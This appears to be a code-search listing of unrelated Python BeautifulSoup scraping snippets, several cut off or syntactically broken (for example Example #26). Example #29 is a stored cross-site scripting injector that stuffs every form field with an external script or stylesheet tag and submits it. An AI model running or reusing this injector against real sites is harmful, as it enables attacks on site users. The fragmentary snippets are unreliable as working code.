Example #1
0
def main():
	href = 'https://tw.stock.yahoo.com/q/q?s=2412'
	page = urlopen(href) 
	'''
	try:
		href = 'https://tw.stock.yahoo.com/q/q?s=2412'
		session = requests.Session()
		s_time = time.time()
		page = urlopen(href)
		e_time = time.time()
		print ( str(e_time - s_time) + ' was costed to get a page.' )
	except requests.exceptions.HTTPError:
		return None
	'''
	soup = BeautifulSoup(page)
	#print(soup.prettify()) 
	# using BequtifulSoup 3 
	if soup is None:
		print('soup is none')

	# align="center" bgcolor="#FFFfff" nowrap
	head = []
	for th in soup.find_all(['th'], width='55'):
		head.append(th.text)
	value = []
	for td in soup.find_all(['td'], bgcolor='#FFFfff'):
		value.append(td.text)
	for i in range(0,len(head)):
		print ( head[i] + ' ' + value[i].rstrip() )
	# /logos/doodles/2014/world-cup-2014-42-4675815216250880-hp.gif 
	'''
def word_parser(word_link) :

  opener = urllib2.build_opener()
  opener.addheaders = [("User-agent", "Mozilla/5.0")] 
  word_page = opener.open(word_link)
  word_soup = BeautifulSoup(word_page)  
  
  
  the_word = re.sub('http://thesaurus.com/browse/', '', str(word_link))
  
  word_check = the_word
  word_check_class = None
  word_extract = "Start"  
  
  while word_extract != None :
    
    word_extract = re.search(re.compile('<table cellspacing="5" class="the_content">.*?</table>', re.DOTALL), str(word_soup)).group()
    word_extract_soup = BeautifulSoup(word_extract)
    for link in word_extract_soup.find_all("a", "nud"):
      word_check = link.get_text()
    
    if word_check != the_word : break
    
    word_check_class = word_extract_soup.find_all("div", "adjHdg")
    if str(word_check_class) != "[]" : break
    
    parser_core(word_extract)
     
    word_soup = re.sub(re.compile('<table cellspacing="5" class="the_content">.*?</table>', re.DOTALL), '\n', str(word_soup), 1)
    
    word_extract_none = re.search(re.compile('<table cellspacing="5" class="the_content">.*?</table>', re.DOTALL), str(word_soup))
    if word_extract_none == None : break
Example #3
0
 def search(self, terms):
     torrents = []
     p = []
     if terms.find(' '):
         p = terms.split(' ')
     else:
         p.append(terms)
     self.urlTemp = self.url
     if p[0] == "series" or p[0] == "films":
         if p[0] == "series":
             self.urlTemp += "/torrents_series.html"
         if p[0] == "films":
             self.urlTemp += "/torrents_films.html"
         if len(p) > 1:
             self.urlTemp += ",page-" + str(int(int(p[1]) - 1))
     else:
         search = self.clean(terms)
         search = search + ".html"
         self.urlTemp += self.path + search
     try:
         f = requests.get(self.urlTemp,
                          cookies=self.tokens,
                          headers=self.headers)
     except:
         self.initializeScraper()
         try:
             f = requests.get(self.urlTemp,
                              cookies=self.tokens,
                              headers=self.headers)
         except:
             if (f.status_code != requests.codes.ok):
                 f.raise_for_status()
             raise Exception('something wrong')
     response = f.text
     if self.error in response:
         # raise Exception("no torrent")
         return torrents
     else:
         soup = BeautifulSoup(response, 'html.parser')
         tds = soup.find_all("td")
         for td in tds:
             if td.i != None:
                 if "fa" in td.i.get("class"):
                     attributs = td.parent.find_all("td")
                     f2 = requests.get(td.a['href'],
                                       cookies=self.tokens,
                                       headers=self.headers)
                     soup = BeautifulSoup(f2.text, 'html.parser')
                     dl = soup.find_all(
                         'a', {'class': "btn btn-danger download"})
                     torrents.append({
                         'url': self.url + dl[1]['href'],
                         'name': td.a.text.encode('utf-8'),
                         'seeds': int(attributs[2].text),
                         'leechers': int(attributs[3].text),
                     })
     return torrents
Example #4
0
def getTrack(content):
    selected_track = None
    sleep(0.5)
    request_content_page = requests.get(tunefind_search_uri + content['uri'],
                                        headers)
    soup = BeautifulSoup(request_content_page.text, 'html.parser')
    all_tracks = soup.find_all(
        class_='AppearanceRow__container___XH3q9'
    ) if content['type'] == 'artist' else soup.find_all(
        class_='SongRow__container___3eT_L')

    if not len(all_tracks):
        print("We couldn't find any songs for this %s" % (content['type']))
        return

    minEntryIndex = int(min(range(len(all_tracks))) + 1)
    maxEntryIndex = int(max(range(len(all_tracks))) + 1)

    if minEntryIndex == maxEntryIndex:
        playback_link = extractMediaLink(all_tracks[0])
        openLink(playback_link)
        return

    for index, track_single in enumerate(all_tracks):
        song_title = track_single.find(
            class_='AppearanceRow__songInfoTitle___3nWel'
        ) if content['type'] == 'artist' else track_single.find(
            class_='SongTitle__link___2OQHD')
        print('Title: %s' % (song_title.text))
        print('Index: %d' % (int(index) + 1))

    select_number = input(
        'Please select a number from %d to %d for the track you want: ' %
        (minEntryIndex, maxEntryIndex))

    while not select_number:
        select_number = input('Please select a number from %d to %d: ' %
                              (minEntryIndex, maxEntryIndex))

    while not int(select_number) >= minEntryIndex:
        select_number = input('Please select a number from %d to %d: ' %
                              (minEntryIndex, maxEntryIndex))

    while not int(select_number) <= maxEntryIndex:
        select_number = input('Please select a number from %d to %d: ' %
                              (minEntryIndex, maxEntryIndex))

    selected_track = all_tracks[int(select_number) - 1]
    playback_link = extractMediaLink(selected_track)
    openLink(playback_link)
Example #5
0
    def subcommand_news_find(self, user, dst, args):
        """Queries Google News for the first page of news results
        for a given keyword.
        Syntax: {0}news find <keyword>
        """
        if not user.admin:
            raise PluginBase.InvalidPermission
        try:
            # TODO: Consider the safety of directly placing user input
            r = requests.get(self.strings.URL_GOOGLE_SEARCH.format(args))
        except requests.ConnectionError:
            self.irch.say(self.strings.CONNECTION_ERROR, dst)
            return

        r.encoding = 'utf-8'
        soup = BeautifulSoup(r.text)

        titles = soup.find_all(class_='r')
        search_set = []

        for tag in titles:
            url = tag.contents[0].attrs['href'].split('=', 1)[1]
            title = tag.text
            parent = tag.parent
            source, timestamp = parent.find(class_='f').text.split(' - ')
            summary = parent.find(class_='st').text

            search_set.append([title, timestamp, source, url, summary])

        if len(search_set) > 0:
            self.news['set'] = NewsSet(name='Search: {0}'.format(args),
                                       set_=search_set)
            self.irch.say(self.news['set'].get(), dst)
        else:
            self.irch.say(self.strings.KEYWORD_NOT_FOUND, dst)
def parseHTML(page, output_f):
	array = [] 
	soup = BeautifulSoup(page,'html.parser')
	for div in soup.find_all('div',class_ = DIV_SELECTOR):
		try:
			event = div.find('div',class_ = EVENT_SELECTOR)
			if event:
				elt ={}
				link = event.find('a')
				text = link.get_text()
				if isVisit(text):
					elt['visit'] = text
				else :
					elt['query_text'] = text
				elt['link'] = link["href"]
				elt['date'] = event.find('br').get_text()
				meta = div.find('div',class_ =META_SELECTOR)
				if meta :
					elt['meta'] = meta.get_text()
				array.append(elt)
		except:
			print "Failed to parse elt"	

  
	print array	
	print output_f
	with open(output_f, 'w') as outfile:
		json.dump(array, outfile)	
def getEcNumbers(file):
    handler = open(file).read()
    soup = Soup(handler, 'xml')
    reactions = soup.find_all('reaction')
    ec_numbers = {}

    for reaction in reactions:
        links = reaction.find_all("li")
        BiGG_ID = ""
        EC_number = ""

        for link in links:
            if "identifiers.org/ec-code" in link['resource']:
                EC_number = link['resource'][31:]
            elif "identifiers.org/bigg.reaction" in link['resource']:
                BiGG_ID = reaction['id']
                if 'R_' in BiGG_ID:
                    BiGG_ID = BiGG_ID[2:]

        if EC_number and BiGG_ID:
            # CHANGED: now we just save the EC number, since the names of the
            # enzymes and metabolites were never used for querying Brenda.
            ec_numbers[BiGG_ID] = EC_number

    return ec_numbers
def get_json():
    try:
        from BeautifulSoup import BeautifulSoup
    except ImportError:
        from bs4 import BeautifulSoup

    def get_website_source(url: str) -> str:
        request_headers = {
            'User-Agent':
            'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) '
            + 'Chrome/35.0.1916.47 Safari/537.36'
        }
        request = urllib.request.Request(url, headers=request_headers)
        with urllib.request.urlopen(request) as response:
            # print(response.read())
            return response.read().decode('utf-8')

    print('Download page ')
    source = get_website_source(
        'http://ftp.ebi.ac.uk/pub/databases/RNAcentral/current_release/json/')

    # print(source)
    parsed_html = BeautifulSoup(source, "lxml")

    names_json = []
    for row in parsed_html.find_all('a'):
        href = row['href']
        if 'ensembl-xref-' in href:
            names_json.append(href)

    return names_json
Example #9
0
def gather_html():
    stat_ids = []
    for category in category_labels:
        category_url = category_url_stub % (category)
        page = requests.get(category_url)
        html = BeautifulSoup(page.replace('\n',''), 'html.parser')
        for table in html.find_all("div", class_="table-content"):
            for link in table.find_all("a"):
                stat_ids.append(link['href'].split('.')[1])
    starting_year = 2015 #page in order to see which years we have info for
    for stat_id in stat_ids:
        url = url_stub % (stat_id, starting_year)
        page = requests.get(url)
        html = BeautifulSoup(page.replace('\n',''), 'html.parser')
        stat = html.find("div", class_="parsys mainParsys").find('h3').text
        print stat
        directory = "stats_html/%s" % stat.replace('/', ' ') #need to replace to avoid
        if not os.path.exists(directory):
            os.makedirs(directory)
        years = []
        for option in html.find("select", class_="statistics-details-select").find_all("option"):
            year = option['value']
            if year not in years:
                years.append(year)
        url_filenames = []
        for year in years:
            url = url_stub % (stat_id, year)
            filename = "%s/%s.html" % (directory, year)
            if not os.path.isfile(filename): #this check saves time if you've already downloaded the page
                url_filenames.append((url, filename))
            jobs = [gevent.spawn(gather_pages, pair[0], pair[1]) for pair in url_filenames]
            gevent.joinall(jobs)
Example #10
0
    def subcommand_news_find(self, user, dst, args):
        """Queries Google News for the first page of news results
        for a given keyword.
        Syntax: {0}news find <keyword>
        """
        if not user.admin:
            raise PluginBase.InvalidPermission
        try:
            # TODO: Consider the safety of directly placing user input
            r = requests.get(self.strings.URL_GOOGLE_SEARCH.format(args))
        except requests.ConnectionError:
            self.irch.say(self.strings.CONNECTION_ERROR, dst)
            return

        r.encoding = 'utf-8'
        soup = BeautifulSoup(r.text)

        titles = soup.find_all(class_='r')
        search_set = []

        for tag in titles:
            url = tag.contents[0].attrs['href'].split('=', 1)[1]
            title = tag.text
            parent = tag.parent
            source, timestamp = parent.find(class_='f').text.split(' - ')
            summary = parent.find(class_='st').text

            search_set.append([title, timestamp, source, url, summary])

        if len(search_set) > 0:
            self.news['set'] = NewsSet(name='Search: {0}'.format(args), set_=search_set)
            self.irch.say(self.news['set'].get(), dst)
        else:
            self.irch.say(self.strings.KEYWORD_NOT_FOUND, dst)
Example #11
0
 def get_comment(self, item):
     html = self.__down_load(item, 1)
     # print html
     soup = BeautifulSoup(html)
     if soup:
         for l in soup.find_all(attrs={'class': 'u-con'}):
             print l.string
Example #12
0
def olx_parser(home_ids):
    data = []
    page = requests.get(OLX_URL)
    soup = BeautifulSoup(page.text, "lxml")
    tables = soup.find_all('table', attrs={'summary': 'Ogłoszenie'})
    for table in tables:
        id = table.attrs['data-id']
        if id in home_ids:
            continue
        text = ""
        url = ""
        img = ""
        table_body = table.find('tbody')
        rows = table_body.find_all('tr')
        for row in rows:
            cols = row.find_all('td')
            if cols[0].contents[1].name == 'a':
                url = cols[0].contents[1].attrs['href']
            if cols[0].contents[1].contents[1].name == 'img':
                img = cols[0].contents[1].contents[1].attrs['src']
            cols = [ele.text.rstrip() for ele in cols]
            for col in cols:
                text = text + col.replace("\n", " ") + " "
        while '  ' in text:
            text = text.replace('  ', ' ')
        data.append(Home(table.attrs['data-id'], text, url, img))

    return data
Example #13
0
def find_tag(html, tag):

    # parse text
    parsed_html = BeautifulSoup(html)
    tags_all = parsed_html.find_all(tag)

    # find all instances of tag and its weight attribute, if any
    tags = []
    weights = []
    if tags_all:
        for item in tags_all:
            tags.append(item.text.strip())
            if 'weight' in item.attrs:
                weights.append(item['weight'])

    # return results in special cases
    if not tags:
        return '', ''
    elif 'NO CATEGORIES' in tags:
        return 'NO CATEGORIES', ''
    elif len(tags) == 1 and len(weights) == 1:
        return tags[0], weights[0]
    elif len(tags) == 1 and not weights:
        return tags[0], ''

    # return results
    return tags, weights
Example #14
0
def extract_tenders_from_web_page_by_url(url):
    html = requests.get(url).text
    parsed_html = BeautifulSoup(html, "html.parser")
    if is_last_page(parsed_html):
        return None
    a = parsed_html.find_all("a", {"class": "shortestProcedures__item"})
    tender_list = []
    for tender in a:
        t = Tender()
        t.link = tender['href']
        t.number = tender.find("div", {
            "class":
            "shortestProcedures__cell shortestProcedures__cell--number"
        }).get_text()
        t.description = tender.find(
            "div", {
                "class":
                "shortestProcedures__cell shortestProcedures__cell--description"
            }).get_text()
        t.company = tender.find("span", {
            "class": "shortestProcedures__customerName"
        }).get_text()
        t.date = tender.find("span", {
            "class": "shortestProcedures__date"
        }).get_text()
        t.price = tender.find(
            "span", {
                "class":
                "shortestProcedures__price shortestProcedures__price--noPrice"
            }).get_text()
        tender_list.append(t)
    return tender_list
Example #15
0
def poslaju_info(trackingno):
    _data = {'trackingNo03': trackingno}

    response = requests.post(
        'https://www.pos.com.my/postal-services/quick-access/?track-trace',
        data=_data).text

    if "Please insert the correct Tracking Number.No" in response:
        return None

    regex = re.compile(r'var strTD =  "(.*?)</table>";', re.S | re.M)
    table = regex.search(response).group(1)

    soup = BeautifulSoup(table, "lxml")
    rows = soup.find_all("table")[1].find_all("tr")

    data = []
    for row in rows:
        cells = row.find_all("td")
        items = []
        for cell in cells:
            items.append(truncate(cell.text.strip()))
        data.append(items)
    data.pop(0)  # first row has headers

    print(
        tabulate.tabulate(data,
                          headers=["datetime", "details", "location"],
                          tablefmt="simple"))
Example #16
0
def parse_table(
        source: str,
        interpret_cells: bool = True) -> Tuple[List[str], List[List[str]]]:
    if interpret_cells:
        for replacement in sub_sup_replacements:
            source = source.replace(replacement,
                                    sub_sup_replacements[replacement])
    parsed_html = BeautifulSoup(source, "lxml")
    column_count = None
    header = []
    rows = []
    current_rowspans = []
    for row in parsed_html.find_all('tr'):
        cells = [x for x in row.find_all('td')]
        if len(cells) == 0:
            cells = [x.text.strip() for x in row.find_all('th')]
            column_count = len(cells)
            current_rowspans = [[0, None]] * column_count
            header = cells
        else:
            if column_count is None:
                column_count = len(cells)
                current_rowspans = [[0, None]] * column_count
            for i in range(0, len(current_rowspans)):
                if current_rowspans[i][0] > 0:
                    cells.insert(i, current_rowspans[i][1])
                    current_rowspans[i][0] -= 1
            for i in range(0, len(cells)):
                if 'rowspan' in cells[i].attrs:
                    current_rowspans[i][0] = int(cells[i].attrs['rowspan']) - 1
                    del cells[i].attrs['rowspan']
                    current_rowspans[i][1] = cells[i]
            rows.append([get_cell_contents(x, interpret_cells) for x in cells])
    return header, rows
Example #17
0
def lel_info(trackingnumber):
    response = requests.get("https://tracker.lel.asia/tracker?trackingNumber="\
        + trackingnumber\
        + "&lang=en-US")

    soup = BeautifulSoup(response.text, "html.parser")

    trace__date_rows = soup.find_all('div', {'class': 'trace__date_row'})
    data = []

    for trace__date_row in trace__date_rows:
        elem = trace__date_row.find("div", {"class": "trace__date"}).text
        date = " ".join(elem.split())

        trace__items = trace__date_row.find_all('tr', {'class': 'trace__item'})

        for trace__item in trace__items:
            time = trace__item.find('span', {'class': '.trace__time'}).text
            value = trace__item.find('span', {
                'class': 'trace__event-value'
            }).text

            data.append([date, time, value])

    t_headers = "Date Time Description".split(" ")
    print(t(data, headers=t_headers))
Example #18
0
def getmovielist(html):
    soup=BeautifulSoup(html)
         
    divs=soup.find_all('ul',{'class':'mod_list_pic_130'})
    for div_html in divs:
        div_html = str(div_html).replace('\n','')
        getmovie(div_html)
Example #19
0
def pridobiXML(pot):
    #Pridobi datoteke
    datoteke = [f for f in listdir(pot) if isfile(join(pot, f))]
    st = 0

    print("-----" + str(len(datoteke)) + " datotek pridobljenih-----")

    #Seznam lematiziranih clankov
    clanki_lem = []

    print("-----Razvrščanje besed v objekte-----")
    #Preberi datoteke v UTF-8

    for d in datoteke:
        if (st % 100 == 0):
            print(".", end="")

        fileObj = codecs.open(pot + d, "r", "utf-8")
        soup = BeautifulSoup(fileObj, 'xml')
        words = soup.find_all('w')
        datum = d.split("_")[1:]
        datum[-1] = datum[-1][0:4]
        clanki_lem.append([])

        #Pridobi besede in jih shrani v seznam
        for w in words:
            lb = LematiziranaBeseda(w['lemma'], w['msd'], w.get_text(), datum)
            clanki_lem[st].append(lb)

        st += 1

    return clanki_lem
Example #20
0
def querySite(domain):
    print('Now visiting ' + domain)
    sleep(3)
    request_search_page = requests.get(domain, headers=headers)
    soup = BeautifulSoup(request_search_page.text, 'html.parser')
    results = soup.find_all(class_='g')

    if request_search_page.status_code is not 200:
        print(
            'Error: The URL you are trying to access is returning a status code of %s'
            % (request_search_page.status_code))
        print('This is the response we got: %s' % (request_search_page.text))
        return

    if not len(results):
        print('We couldn\'t find any pages for this URL: %s' % (domain))
        return

    for result in results:
        url = result.find('a')['href']
        parsed_url = urllib.parse.urlparse(url)

        if len(parsed_url.query) > 0 or parsed_url.query is not None:
            query_params = urllib.parse.parse_qs(parsed_url.query)

            if not isEmpty(query_params) and 'q' in query_params:
                url = urllib.parse.parse_qs(parsed_url.query)['q'][0]

        if len(str(url)) < 1:
            continue

        print('Now crawling ' + url)

        sleep(3)

        meta_title = getMeta('title', url)
        meta_description = getMeta('description', url)

        if url is None:
            url = 'N/A'

        if meta_title is None:
            meta_title = 'N/A'

        if meta_description is None:
            meta_description = 'N/A'

        message = str("URL: %s Title: %s Description: %s") % (url, meta_title,
                                                              meta_description)

        print(message, file=outfile)

    if soup.find(isNextLink) is None:
        return

    next_step_link = str(google_base_uri + soup.find(isNextLink)['href'])

    if next_step_link is not None:
        querySite(next_step_link)
Example #21
0
File: Tbot.py Project: fmg777/Tbot
def function(message):
    news = urllib.request.urlopen(
        'https://ttrcoin.com/article/novosti.12/').read()
    parsed_html = BeautifulSoup(news)
    links = parsed_html.find_all('a', attrs={'class': 'attachHolder'})
    bot.reply_to(
        message,
        "https://ttrcoin.com/article/novosti.12/" + links[1].get('href'))
Example #22
0
def parse_xml(output):
    try:
        from BeautifulSoup import BeautifulSoup
    except ImportError:
        from bs4 import BeautifulSoup
    try:
        path = sys.argv[1]
        file = '../{}/bin/Debug/TestResult.xml'
        file = file.format(path)
        xml = open(file)
    except:
        print(
            'Error: Enter a valid file path argument or file not found or inaccessible'
        )
        return -1
    body = []
    soup = BeautifulSoup(xml, 'xml')
    message = ''
    log = ''
    for tag in soup.find_all('test-case'):
        try:
            runName = tag['classname']
            stepName = tag['methodname']
        except:
            runName = tag['fullname']
            stepName = tag['name']
        status = tag['result']
        if tag.find('start-time') is not None and tag.find(
                'end-time') is not None:
            start = tag['start-time']
            startArr = start.split()
            start = startArr[0] + 'T' + startArr[1]
            end = tag['end-time']
            endArr = end.split()
            end = endArr[0] + 'T' + endArr[1]
        else:
            start = None
            end = None
        if status == "Failed":
            status = "FAIL"
        elif status == "Passed":
            status = "PASS"
        else:
            status = "SKIP"
        if status == 'FAIL':
            if tag.find('stack-trace') is not None:
                log = tag.find('stack-trace').text
                log = base64.b64encode(bytes(log, 'utf-8'))
                log = log.decode('utf-8')
            if tag.find('message') is not None:
                message = tag.find('message').text
        else:
            message = ''
            log = ''
        value = create_test_logs_json(runName, stepName, status, message, log,
                                      start, end, output)
        body.append(value)
    return body
Example #23
0
    def run(self):

        while self.CRAWL:
            # print "Waiting for new URL"
            link = self.urlq.get()  # get the Original Link

            try:
                # print "Waiting to fetch data "
                data = urllib2.urlopen(link).read()  # Fetch data form the Original Link with 15seconds as timeout
            except:
                print "Check Your Internet Connection it has either disconnected or is slow"
                self.urlq.task_done()
                continue
            try:
                soup = BeautifulSoup(data, 'html.parser')
                for atag in soup.find_all('a'):  # Get the list of all links within Original Link
                    lnk = atag.get('href')

                    if lnk is None:
                        continue
                    else:
                        lnk = lnk.encode('utf-8')  # Convert the links to utf encoding

                        if lnk in UniqueURLs:  # Avoid crawling visited links so that it doesnt go into a loop!
                            continue

                        if lnk.startswith('http:') or lnk.startswith('https:'):
                            # print "Normal links "+lnk
                            self.urlq.put(lnk)

                        elif lnk.startswith('javascript:'):  # Continue loop if the link is a javascript call
                            # print "Javascript call "+lnk
                            continue

                        elif lnk.startswith('#'):  # Continue loop if the link is a #tag/fragments
                            # print "#tags"
                            continue

                        else:
                            # print "Relative links "+urlparse.urljoin(link,lnk)
                            self.urlq.put(urlparse.urljoin(link, lnk) + "")  # convert relative link into absolute link and add to Queue

            except Exception, e:
                print "Exception has occured with this link", e, lnk

            with lock:
                self.UniqueURLs[link] = 1  # Put the visited link into a dictionary so that already crawled links can be avoided
                if len(self.UniqueURLs) < LIMIT:
                    self.CRAWL = False  # Set CRAWL to false to stop further crawling
                    print self.name + " LIMIT has reached The rest of the unique URLs will be added to the dictionary and saved!"
                while self.urlq.qsize():  # Put the rest of the unique link into the dictionary
                    lnk = self.urlq.get()
                    if lnk in self.UniqueURLs:
                        self.urlq.task_done()
                        continue
                    self.UniqueURLs[lnk] = 1
                    self.urlq.task_done()
                self.urlq.task_done()
Example #24
0
def parse_results(report):
	data = open('/root/{}'.format(report))
	structure = str(data.readlines())
	soup = BeautifulSoup(structure, 'html.parser')
	tables1 = str(soup.find_all(class_="table table-bordered table-striped")[1])
	tables2 = str(soup.find_all(class_="table table-bordered table-striped")[2])
	tables3 = str(soup.find_all(class_="table table-bordered table-striped")[3])
	soup1 = BeautifulSoup(tables1, 'html.parser')
	soup2 = BeautifulSoup(tables2, 'html.parser')
	soup3 = BeautifulSoup(tables3, 'html.parser')
	rrd4k_data = soup1.find_all('td')[3].string
	rwd4k_data = soup1.find_all('td')[5].string
	rrd16MiB_data = soup2.find_all('td')[3].string
	rwd16MiB_data = soup2.find_all('td')[5].string
	try:
		rws10ms_data = int(soup3.find_all('td')[3].string)
	except ValueError:
		rws10ms_data = 0
	try:
		rws30ms_data = int(soup3.find_all('td')[5].string)
	except ValueError:
        	rws30ms_data = 0
	rws100ms_data = int(soup3.find_all('td')[7].string[2:])

	rrd4k_iops = int(re.findall(r"[\d']+", rrd4k_data)[0])
	rwd4k_iops = int(re.findall(r"[\d']+", rwd4k_data)[0])
	rrd16MiB_bandwidth = int(re.findall(r"[\d']+", rrd16MiB_data)[0])
	rwd16MiB_bandwidth = int(re.findall(r"[\d']+", rwd16MiB_data)[0])

	rrd4k_dev = int(re.findall(r"[\d']+", rrd4k_data)[-1])
	rwd4k_dev = int(re.findall(r"[\d']+", rwd4k_data)[-1])
	rrd16MiB_dev = int(re.findall(r"[\d']+", rrd16MiB_data)[-1])
	rwd16MiB_dev = int(re.findall(r"[\d']+", rwd16MiB_data)[-1])
	return dict({"rws10ms_data": rws10ms_data, "rws30ms_data": rws30ms_data, "rws100ms_data": rws100ms_data, "rrd4k_iops": rrd4k_iops, "rwd4k_iops": rwd4k_iops, "rrd16MiB_bandwidth": rrd16MiB_bandwidth, "rwd16MiB_bandwidth": rwd16MiB_bandwidth, "rrd4k_dev": rrd4k_dev, "rwd4k_dev": rwd4k_dev, "rrd16MiB_dev": rrd16MiB_dev, "rwd16MiB_dev": rwd16MiB_dev})
Example #25
0
def decodeWebpage(url):
    r = requests.get(url)
    soup = BeautifulSoup(r.text)

    for story_heading in soup.find_all(class_="stroy-heading"):
        if story_heading.a:
            print(story_heading.a.text.replace("\n", " ").strip())
        else:
            print(story_heading.contents[0].strip())
Example #26
0
def job_fnF():
    url = 'https://www1.nseindia.com/live_market/dynaContent/live_watch/option_chain/optionKeys.jsp?segmentLink=17&instrument=OPTIDX&symbol=NIFTY&date=' + edate
    response = requests.get(url)
    resp = response.content
    soup = BeautifulSoup(resp)
    table1 = soup.find('table')
    niftyrow = []
    for row1 in table1.findAll('b'):
        text1 = row1.text.replace('style','')
        niftyrow.append(text1)
    niftyval = int(text1[5:10]) + 2
    callstrk = int(round(niftyval, -2)) + 300
    putstrk = callstrk - 700
    callstring = "%d.00" %callstrk
    for row1 in soup.find_all('tr'):
        cells = row1.find_all('td')
        for cell in cells:
            value = cell.string
            if value == callstring:
                celln = 0
                for cell in cells:
                    celln = celln + 1
                    value = cell.string
                    if celln == 10:
                        #print CallPrice
    putstring = "%d.00" %putstrk
    for row1 in soup.find_all('tr'):
        cells = row1.find_all('td')
        for cell in cells:
            value = cell.string
            if value == putstring:
                celln = 0
                for cell in cells:
                    celln = celln + 1
                    value = cell.string
                    if celln == 14:
                        PutPrice = value
                        #print PutPrice
    indtime= datetime.now() + timedelta(hours=5, minutes=30)
    ddtime = '{:%D:%H:%M:%S}'.format(indtime)
#    print "Nifty", niftyval, "Calls",callstrk, "Puts",putstrk, datetime.now(), PutPrice, OpenNifty
    msg = "New: Sell Calls %d , Puts %d , Thanks! "  %(callstrk, putstrk)
    check_output(["yowsup-cli", "demos", "-M","-c", "config", "-s", "*****@*****.**",  "F%s" % msg])
    check_output(["yowsup-cli", "demos", "-M","-c", "config", "-s", "*****@*****.**", "F%s" % msg])
Example #27
0
def get_links(search_name):
    search_name = search_name.replace(' ', '+')
    url = url_base.format(search_name, 0)
    request = ulib.Request(url, None, headers)
    json_string = ulib.urlopen(request).read()
    page = json.loads(json_string)
    new_soup = Soup(page[1][1], 'lxml')
    images = new_soup.find_all('img')
    links = [image['src'] for image in images]
    return links
Example #28
0
def get_page_words(pdf_file):

    delete_words = [
        '"', ':', ';', '!', '@', '#', '$', '%', '^', '&', '0', '1', '2', '3',
        '4', '5', '6', '7', '8', '9', '*', '(', ')', '+', '-', '_', '=', '{',
        '}', '[', ']', '?', '/', '<', '>', ',', '.', '|', '`', '~', '"', "'",
        '\\'
    ]

    contents = convert_pdf_to_html(pdf_file)
    # with open(pdf_file) as f:
    #     for line in f.readlines():
    #         contents += line

    contents = contents.replace("\n", "")
    contents = contents.replace("\r", "")
    # contents = contents.rstrip()
    pages = contents.split("<a name=")[1:]
    all_pages = []
    for i in range(len(pages)):
        page_html = BeautifulSoup(pages[i], "html.parser")
        divs = page_html.find_all('div')
        spans = []
        for div in divs:
            spans += div.find_all('span')
        word_list = []
        for span in spans:
            text = span.text.lower()
            text = text.replace("\\n", " ")
            text = text.replace("\\r", " ")
            fin = False
            while not fin:
                if text.find("\\xe") >= 0:
                    idx = text.find("\\xe")
                    text = text.replace(text[idx:idx + 12], "")
                else:
                    fin = True
            for dw in delete_words:
                text = text.replace(dw, " ")
            words = text.split()
            style = span['style']
            bold = ",Bold" in style
            size = style[style.find("font-size:") + 10:-2]
            for word in words:
                if len(word) == 1:
                    continue
                if word != "":
                    word_list.append([word, size, bold])

        all_pages.append(word_list)

    return all_pages


# print (get_page_words("Lec01_note.pdf")[3])
Example #29
0
    def addPopup(self, url): # (self, url, payload)
        self.url = url
        source = urllib.urlopen(self.url)
        soup   = BeautifulSoup(source.read())
        print ">>> Reading Source...\n\n"
        for form in soup.find_all("form"):
            inputs_submit = []
            inputs_field  = []
            #form_action.append(form.get("action"))   # Get URI to will send
            print ">>> Searching field vulnerabilities...\n\n"
            for inputs in form.find_all("input"):
                if inputs.get("type") == "submit":
                    inputs_submit.append(inputs.get("name"))
                    inputs_submit.append(inputs.get("value"))
                elif inputs.get("type") != "submit":
                    inputs_field.append(inputs.get("name"))
                else:
                    print "Not found any field vulnerability :(\n\n"
            for textarea in form.find_all("textarea"):
                inputs_field.append(textarea.get("textarea"))
			
            vectorJS = {}
            path_archive1 = "core/css.js"
            if os.path.isfile(path_archive1) == True:
                for field in inputs_field:
                    vectorJS[field] = """<script src="http://localhost/GSoC/css.js"></script>"""
                vectorJS[inputs_submit[0]] = inputs_submit[1]
                send_vector = urllib.urlencode(vectorJS)
                print ">>> Vector .js attack...!\n\n"
                print send_vector
                print "-"*75
                parts = urlparse.urlsplit(self.url)
                a = ''
                for i in parts.path.split("/")[0:-1]:
                    a += i + "/"
                send_url = parts.scheme + "://" + parts.netloc + a + form.get("action").split("../")[-1]
                b = ''
                for j in parts.path.split("/")[0:-2]:
                    b += j + "/"
                send_url2 = parts.scheme + "://" + parts.netloc + b + form.get("action").split("../")[-1]
                urllib.urlopen(send_url, send_vector)
                urllib.urlopen(send_url2, send_vector)  # Because some pages used '../send.php' to send a request
                vectorCSS = {}
                path_archive2 = "core/injection.css"
                if os.path.isfile(path_archive2) == True:
                    for field in inputs_field:
                        vectorCSS[field] = """<link rel="stylesheet" href="http://localhost/GSoC/injection.css"/>"""
                    vectorCSS[inputs_submit[0]] = inputs_submit[1]
                    
                send_vector2 = urllib.urlencode(vectorCSS)
                print ">>> Vector .css attack...!\n\n"
                print send_vector2
                print "-"*75
                urllib.urlopen(send_url, send_vector2)
                urllib.urlopen(send_url2, send_vector2)
def alphabetical_parser(alphabetical_link) :
  
  opener = urllib2.build_opener()
  opener.addheaders = [("User-agent", "Mozilla/5.0")]
  alphabetical_page = opener.open(alphabetical_link)
  
  alphabetical_soup = BeautifulSoup(alphabetical_page)
  
  for link in alphabetical_soup.find_all("a", "result_link"):
    section_link = link.get("href")
    section_parser(section_link)
Example #31
0
def parseTextFromHtml(html):
    text = ""
    try:
        from BeautifulSoup import BeautifulSoup
    except ImportError:
        from bs4 import BeautifulSoup
    soup = BeautifulSoup(html, "lxml")
    allResult = soup.find_all("div", class_="_3-96 _2let")
    for item in allResult:
        text += item.text + "\n"
    return text
Example #32
0
def getURL(msg):
    """

    :param page: html of web page (here: Python home page) 
    :return: urls in that page 
    """
    soup = BeautifulSoup(msg)
    links = soup.find_all('http:')
    for tag in links:
        link = tag.get('//', None)
        if link != None:
            print link
Example #33
0
def get_recipes_from_page(page_num):
    res = requests.get(BASE_URL + "/recipes/?page=" + str(page_num))
    res_html = BeautifulSoup(res.text, "html.parser")
    recipes_list = []
    article_tags = res_html.find_all("article")
    for i in article_tags:
        try:
            if i.find("a")["href"].startswith("/recipe/"):
                recipes_list.append(i.find("a")["href"])
        except (KeyError, TypeError):
            pass
    return recipes_list
def section_parser(section_link) :
  
  opener = urllib2.build_opener()
  opener.addheaders = [("User-agent", "Mozilla/5.0")] 
  section_page = opener.open(section_link)
  
  section_soup = BeautifulSoup(section_page)
  
  for link in section_soup.find_all("a", "result_link"):  
    word_link = link.get("href")
    text_file.write("%s"%word_link)
    text_file.write("\n")
    word_parser(word_link)
Example #35
0
 def checkRequests(self,siteName):
     try:
         html = urlopen(siteName).read()
         request = BeautifulSoup(html)
         try:
